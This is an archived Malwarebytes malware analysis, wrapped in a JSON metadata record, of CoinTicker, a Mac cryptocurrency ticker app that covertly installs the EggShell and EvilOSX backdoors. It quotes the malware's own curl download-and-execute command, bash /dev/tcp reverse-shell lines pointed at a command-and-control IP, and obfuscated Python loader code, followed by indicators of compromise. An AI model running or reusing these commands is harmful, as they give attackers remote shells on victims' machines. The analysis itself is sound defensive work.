{
	"id": "55da818d-4652-44a6-8999-7d70b27b99ff",
	"created_at": "2026-04-06T02:12:31.165499Z",
	"updated_at": "2026-04-10T13:12:39.569586Z",
	"deleted_at": null,
	"sha1_hash": "09086979ab9afe18fbaa069672416afcaf3705ef",
	"title": "Mac cryptocurrency ticker app installs backdoors",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 193716,
	"plain_text": "Mac cryptocurrency ticker app installs backdoors\r\nBy Thomas Reed\r\nPublished: 2018-10-28 · Archived: 2026-04-06 02:02:43 UTC\r\nAn astute contributor to our forums going by the handle 1vladimir noticed that an app named CoinTicker was\r\nexhibiting some fishy behavior over the weekend. It seems that the app is covertly installing not just one but two\r\ndifferent backdoors.\r\nBehaviors\r\nThe CoinTicker app, on the surface, appears to be a legitimate application that could potentially be useful to\r\nsomeone who has invested in cryptocurrencies. Once downloaded, the app displays an icon in the menu bar that\r\ngives information about the current price of Bitcoin.\r\nThe app’s preferences allow the user to customize the display, showing information about a wide variety of\r\ncryptocurrencies, including Bitcoin, Etherium, and Monero.\r\nhttps://blog.malwarebytes.com/threat-analysis/2018/10/mac-cryptocurrency-ticker-app-installs-backdoors/\r\nPage 1 of 5\n\nAlthough this functionality seems to be legitimate, the app is actually up to no good in the background,\r\nunbeknownst to the user. Without any signs of trouble, such as requests for authentication to root, there’s nothing\r\nto suggest to the user that anything is wrong.\r\nWhen launched, however, the app downloads and installs components of two different open-source backdoors:\r\nEvilOSX and EggShell.\r\nThe app executes the following shell command to download a custom-compiled version of the EggShell server for\r\nmacOS:\r\nnohup curl -k -L -o /tmp/.info.enc https://github.com/youarenick/newProject/raw/master/info.enc; open\r\nThe first part of the command downloads an encoded file from a Github page belonging to a user named\r\n“youarenick” and saves that file to a hidden file named .info.enc in /private/tmp/. Next, it uses openssl to decode\r\nthat file into a hidden Python file named .info.py. Finally, it executes the resulting Python script.\r\nThe .info.py script performs multiple tasks. First it opens a reverse shell connection to a command \u0026 control\r\nserver, using the following command:\r\nnohup bash \u0026\u003e /dev/tcp/94.156.189.77/2280 0\u003e\u00261\r\nhttps://blog.malwarebytes.com/threat-analysis/2018/10/mac-cryptocurrency-ticker-app-installs-backdoors/\r\nPage 2 of 5\n\n(The domain seednode3.parsicoin.net resolves to this IP address.)\r\nNext, it downloads the the EggShell mach-o binary, saving it to /tmp/espl:\r\ncurl -k -L -o /tmp/espl https://github.com/youarenick/newProject/raw/master/mac\r\nFinally, it creates and runs a shell script at /tmp/.server.sh, which also establishes a reverse shell.\r\n#! /bin/bash nohup bash \u0026\u003e /dev/tcp/94.156.189.77/2280 0\u003e\u00261\r\nThe CoinTicker app also creates a user launch agent, named .espl.plist, that runs the same command periodically:\r\n AbandonProcessGroup Label com.apple.espl ProgramArguments sh -c nohup c\r\nIf it seems like this results in the espl binary being launched multiple times, that is indeed the case.\r\nThe software also creates a folder within the user’s Containers folder named .UpQZdhkKfCdSYxg, which is home\r\nto a Python script named plQqVfeJvGo. (We believe these names are randomized, but unfortunately the\r\nCoinTicker app has stopped functioning, so we have been unable to confirm.) This script is encoded to hide the\r\ncontent:\r\n#!/usr/bin/env python # -*- coding: utf-8 -*- import os import getpass import uuid\r\nhttps://blog.malwarebytes.com/threat-analysis/2018/10/mac-cryptocurrency-ticker-app-installs-backdoors/\r\nPage 3 of 5\n\ndef get_uid(): return \"\".join(x.encode(\"hex\") for x in (getpass.getuser() + \"-\" + str(uuid.getnode()\r\nexec(\"\".join(os.popen(\"echo 'U2FsdGVkX19GsbCj4lq2hzo27vqseHTtKbNTx9 ... TjO1GlH1+7cP7pDYa8ykBquk4WhU0\r\nExtracting the script reveals that it is the bot.py script from the EvilOSX backdoor made by Github user\r\nMarten4n6.\r\n#!/usr/bin/env python # -*- coding: utf-8 -*- \"\"\"Minimal bot which loads modules as they are needed f\r\nThis script has been customized to cause the backdoor to communicate with a server at 185.206.144.226 on port\r\n1339. The malware also creates a user launch agent named com.apple.EOFHXpQvqhr.plist designed to keep this\r\nscript running.\r\nImplications\r\nAlthough it’s unknown exactly what goal the hacker behind this malware had in mind, both EggShell and\r\nEvilOSX are broad-spectrum backdoors that can be used for a variety of purposes. Since the malware is\r\ndistributed through a cryptocurrency app, however, it seems likely that the malware is meant to gain access to\r\nusers’ cryptocurrency wallets for the purpose of stealing coins.\r\nAt first, this looked like it could have been a supply chain attack, in which a legitimate app’s website is hacked to\r\ndistribute a malicious version of the app. Such attacks have happened multiple times in the past, such as when the\r\nTransmission site was hacked (twice) to distribute KeRanger and Keydnap, or when a Handbrake mirror server\r\nwas hacked to distribute Proton.\r\nHowever, on further inspection, it looks like this app was probably never legitimate to begin with. First, the app is\r\ndistributed via a domain named coin-sticker.com. This is close to, but not quite the same as, the name of the app.\r\nGetting the domain name wrong seems awfully sloppy if this were a legitimate app. Adding further suspicion, it\r\nseems that this domain was just registered a few months ago on July 13.\r\nFor this reason, Malwarebytes for Mac detects the CoinTicker application in addition to the other components of\r\nthis malware, as OSX.EvilEgg.\r\nOne interesting note about this malware is that none of it requires anything other than normal user permissions.\r\nRoot permissions are not needed. There is often an erroneous over-emphasis on malware’s need for root\r\nprivileges, but this malware is a perfect demonstration that malware does not need such privileges to have high\r\npotential for danger.\r\nIndicators of Compromise\r\nFiles created:\r\n/private/tmp/.info.enc /private/tmp/.info.py /private/tmp/.server.sh /private/tmp/espl ~/Library/Laun\r\nhttps://blog.malwarebytes.com/threat-analysis/2018/10/mac-cryptocurrency-ticker-app-installs-backdoors/\r\nPage 4 of 5\n\nNetwork connections:\r\n94.156.189.77:2280 185.206.144.226:1339\r\nSHA-256:\r\nCoinTicker.zip f4f45e16dd276b948dedd8a5f8d55c9e1e60884b9fe00143cb092eed693cddc4 espl efb5b32f87bfd608\r\nAbout the author\r\nHad a Mac before it was cool to have Macs. Self-trained Apple security expert. Amateur photographer.\r\nSource: https://blog.malwarebytes.com/threat-analysis/2018/10/mac-cryptocurrency-ticker-app-installs-backdoors/\r\nhttps://blog.malwarebytes.com/threat-analysis/2018/10/mac-cryptocurrency-ticker-app-installs-backdoors/\r\nPage 5 of 5",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.malwarebytes.com/threat-analysis/2018/10/mac-cryptocurrency-ticker-app-installs-backdoors/"
	],
	"report_names": [
		"mac-cryptocurrency-ticker-app-installs-backdoors"
	],
	"threat_actors": [],
	"ts_created_at": 1775441551,
	"ts_updated_at": 1775826759,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/09086979ab9afe18fbaa069672416afcaf3705ef.pdf",
		"text": "https://archive.orkl.eu/09086979ab9afe18fbaa069672416afcaf3705ef.txt",
		"img": "https://archive.orkl.eu/09086979ab9afe18fbaa069672416afcaf3705ef.jpg"
	}
}